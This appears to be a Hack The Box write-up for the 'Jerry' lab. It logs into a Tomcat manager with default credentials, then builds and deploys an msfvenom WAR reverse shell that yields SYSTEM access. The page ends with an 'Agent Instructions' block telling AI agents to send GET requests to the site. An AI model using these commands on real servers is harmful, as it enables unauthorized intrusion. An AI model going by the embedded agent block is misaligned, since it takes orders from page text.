# Jerry ![info-card](/files/-M-D-8KbWY2nMALAeR2k) ## Initial Enumeration Our initial enumeration doesn't leave much to the imagination here, our quick nmap scan only returns one open port. ```bash nmap -sV 10.10.10.95 ``` ![Nmap Results](/files/-M-D-8KdGUSIWz0SYOMH) Naturally we assume Tomcat is our target for this box. On tomcat instances, you can reach the management console at `/manage`, but if you didn't know that already, you can find that using gobuster: ```bash gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50 ``` ![Gobuster Results](/files/-M-D-8KfX5YTQ0P4C4O0) For the login we treat it like any other application, google for default credentials. Doing this brought me to a great github repository for default credentials where I found [this](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) page. Using the credentials `tomcat:s3cret` from that list gives us access. ## Execution Looking at the management console, we see something that catches our eye as a path to execution: ![WAR Upload Form](/files/-M-D-8KhpeH8XCWaL5L9) Know that we know we can deploy `war` files to the server, we can generate a reverse shell with `msfvenom`: ```bash msfvenom -p java/shell_reverse_tcp LHOST=$(tunip) LPORT=4443 -f war > evil.war ``` {% hint style="info" %} `tunip` is a handy bash alias I use to get my current IP address for Hack The Box. it is set to `ifconfig tun0 | sed -n '2 p' | awk '{print \$2}'` in my `~/.bash_aliases` {% endhint %} {% hint style="danger" %} If you happen to work out of a folder shared between your kali VM and windows like I do, windows defender will nuke this file as soon as you generate it. So it's best to do this somewhere else (I just generated it in `/tmp`) {% endhint %} After uploading this file we can see it in the list of running applications: ![Evil War Application](/files/-M-D-8Kj7Mp_7HoBnJnH) Clicking on the link to our malicious application triggers the reverse shell. It just happens that Tomcat is run as `nt authority/system` in this case, so we now have full access to the system and are able to read the user and root flags: ![User and Root Flags](/files/-M-D-8KlvERQiHSHW5kx) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.jacobshodd.com/writeups/hack-the-box/jerry.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.